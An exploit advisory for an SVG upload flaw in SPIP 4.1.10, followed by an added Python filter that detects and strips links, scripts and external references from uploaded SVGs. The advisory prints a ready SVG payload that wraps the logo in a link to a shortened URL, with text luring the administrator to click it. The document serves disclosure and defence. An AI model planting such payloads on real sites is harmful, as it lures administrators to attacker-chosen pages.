## Exploit Title: spip v4.1.10 - Spoofing Admin account
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/

## Description:
A malicious user can upload an SVG file that the upload function does not filter. SVG is an XML format, so the file can carry an `<a xlink:href="...">` element that turns the rendered image into a clickable link. The attacker can then trick the administrator of the system into "checking his logo": clicking on the uploaded image sends the administrator to an attacker-chosen, possibly very dangerous, URL. The root causes are wrong web application logic and an upload function that does not sanitize SVG content.

STATUS: HIGH - Vulnerability

[+] Exploit:

```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <defs>
    <linearGradient id="badgeGradient">
      <stop offset="0"/>
      <stop offset="1"/>
    </linearGradient>
  </defs>
  <g id="heading">
    <a xlink:href="https://rb.gy/74f0y">
      <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4 29.9,22.3 29.6,22.8 z"/>
      <!--<text id="label" x="5" y="20" transform = "rotate(-15 10 10)">New</text>-->
      <text id="title" x="40" y="20">Please click on the logo, to see our design services, on our website, thank you!</text>
    </a>
  </g>
</svg>
```

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html

## Time spent: 00:37:00
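The upload-side check that the description calls for, as an added example that is neither SPIP's code nor part of the author's exploit: a Python filter that either reports why an uploaded SVG logo must be rejected, or strips the link wrapper, event handlers and external references while keeping the artwork. The function names and both embedded sample documents are constructed for this example; the malicious one mirrors the structure of the payload above with a shortened path. It generalises beyond the `<a xlink:href>` case to the other ways an SVG can navigate or fetch (`<script>`, `on*` handlers, external `href`/`url()`).

```python
"""Added example (not SPIP code): detect and strip the link-in-logo trick.

Standard library only.  For production parsing of untrusted XML prefer
defusedxml over xml.etree, which does not defend against entity-expansion
attacks; the link/script checks below are the same either way.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements a user-supplied logo never needs.  <a> is listed so it is reported,
# but sanitisation unwraps it instead of deleting the artwork it contains.
FORBIDDEN_TAGS = {"a", "script", "foreignObject", "iframe", "embed", "object"}

# Constructed sample: the advisory payload's structure, path shortened.
MALICIOUS_LOGO = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <defs><linearGradient id="badgeGradient"><stop offset="0"/></linearGradient></defs>
  <g id="heading">
    <a xlink:href="https://rb.gy/74f0y">
      <path id="badge" d="M 0,0 L 10,0 L 10,10 z"/>
      <text id="title" x="40" y="20">Please click on the logo!</text>
    </a>
  </g>
</svg>"""

# Constructed sample: a benign logo whose only references are internal fragments.
BENIGN_LOGO = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <defs>
    <linearGradient id="badgeGradient"><stop offset="0"/></linearGradient>
    <path id="badge" d="M 0,0 L 10,0 L 10,10 z"/>
  </defs>
  <use xlink:href="#badge" fill="url(#badgeGradient)"/>
</svg>"""


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1]


def _has_external_url(value):
    """True if any url(...) in a style/paint value points outside the document."""
    for arg in re.findall(r"url\(([^)]*)\)", value):
        if not arg.strip().strip("'\"").strip().startswith("#"):
            return True
    return False


def _bad_attribute(tag, attr, value):
    """Return a finding if the attribute may navigate or fetch, else None."""
    name = _local(attr)
    if name.lower().startswith("on"):          # onclick, onload, ...
        return f"event handler {name} on <{tag}>"
    if name == "href" and not value.strip().startswith("#"):
        return f"external reference on <{tag}>: {value.strip()}"
    if _has_external_url(value):               # style="...url(http://...)", fill=url(...)
        return f"external url() in {name} on <{tag}>"
    return None


def svg_findings(svg_text):
    """List the reasons an uploaded SVG should be rejected (empty list = clean)."""
    findings = []
    for elem in ET.fromstring(svg_text).iter():
        tag = _local(elem.tag)
        if tag in FORBIDDEN_TAGS:
            findings.append(f"forbidden element <{tag}>")
        for attr, value in elem.attrib.items():
            finding = _bad_attribute(tag, attr, value)
            if finding:
                findings.append(finding)
    return findings


def _scrub(parent):
    for child in list(parent):
        _scrub(child)                      # children first, so unwrapped nodes are already clean
        tag = _local(child.tag)
        if tag == "a":                     # keep the artwork, drop the link wrapper
            idx = list(parent).index(child)
            parent.remove(child)
            for offset, grandchild in enumerate(list(child)):
                parent.insert(idx + offset, grandchild)
        elif tag in FORBIDDEN_TAGS:
            parent.remove(child)
    for attr in list(parent.attrib):
        if _bad_attribute(_local(parent.tag), attr, parent.attrib[attr]):
            del parent.attrib[attr]


def sanitize_svg(svg_text):
    """Return the SVG with links unwrapped and other dangerous parts removed."""
    root = ET.fromstring(svg_text)
    _scrub(root)
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for reason in svg_findings(MALICIOUS_LOGO):
        print("reject:", reason)
    print(sanitize_svg(MALICIOUS_LOGO))
```

Rejecting on any finding is the safer policy for an upload endpoint; `sanitize_svg` is for the case where the product wants to keep the logo. Serving uploaded SVGs with `Content-Disposition: attachment` or from a separate origin is a complementary control, since an inline `<svg>` link still navigates the administrator's session.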